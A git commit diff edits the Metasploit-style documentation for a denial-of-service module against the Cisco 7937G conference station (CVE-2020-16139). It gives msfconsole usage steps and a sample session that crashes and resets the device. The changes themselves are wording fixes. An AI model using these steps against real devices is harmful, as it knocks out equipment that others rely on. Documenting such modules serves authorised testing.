Update CVE-2020-16139.md
This commit is contained in:
parent
b4689dfa2d
commit
0e0bdc4f98
|
@ -1,7 +1,7 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
|
||||
This module has been tested successfully against SCCP-1-4-5-5 and SCCP-1-4-5-7.
|
||||
This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
|
||||
|
||||
### Description
|
||||
|
||||
|
@ -12,17 +12,22 @@ This module exploits a bug in how the conference station handles executing a pin
|
|||
1. Obtain a Cisco 7937G Conference Station.
|
||||
2. Enable Web Access on the device (default configuration).
|
||||
3. Start msfconsole
|
||||
4. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
|
||||
5. Do: `set RHOST 192.168.1.10`
|
||||
4. Do: `use auxiliary/dos/cisco/cve_2020_16139`
|
||||
5. Do: `set rhost 192.168.1.10`
|
||||
6. Do: `run`
|
||||
7. The conference station should become nonresponsive and then power cycle itself.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cisco 7937G SCCP-1-4-5-7
|
||||
### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
|
||||
```
|
||||
msf5 > use auxiliary/dos/cisco/cve_2020_16139
|
||||
msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209
|
||||
rhost => 192.168.110.209
|
||||
msf5 auxiliary(dos/cisco/cve_2020_16139) > run
|
||||
|
||||
[*] Starting server...
|
||||
[*] 192.168.110.209 - Sending DoS packets. Stand by.
|
||||
[*] 192.168.110.209 - Sending DoS Packets. Stand by.
|
||||
[*] 192.168.110.209 - DoS reset attack completed!
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue